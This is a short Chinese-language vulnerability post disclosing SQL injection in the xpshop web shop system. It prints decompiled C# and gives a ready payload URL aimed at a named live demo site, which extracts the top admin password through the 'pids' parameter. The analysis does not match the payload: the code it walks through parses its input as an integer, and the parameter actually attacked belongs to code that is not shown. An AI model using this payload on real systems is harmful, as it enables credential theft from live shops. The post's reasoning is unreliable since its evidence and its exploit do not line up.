xpshop网店系统sql注入(demo演示)

  • A+
所属分类:漏洞时代
摘要

漏洞位置:xpshop.webui.MyRefund跟进函数GetPackagePdtGID:没过滤直接进库,直接回显的!


漏洞作者: 不能忍

详细说明:

漏洞位置:xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)   {    if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"]))    {     string text = base.Request.QueryString["Action"];     if (text != null)     {      if (!(text == "GetImg"))      {       if (text == "GetPackageGID")       {        base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));       }      }      else      {       this.GetImg(base.Request.QueryString["pids"]);      }

跟进函数GetPackagePdtGID:

public int GetPackagePdtGID(int productID)    {     object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "select GoodsID from Goods where ProductID = " + productID, null);     return (obj != null) ? ((int)obj) : 0;    }

 

没过滤直接进库,直接回显的!

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

漏洞证明:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

xpshop网店系统sql注入(demo演示)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: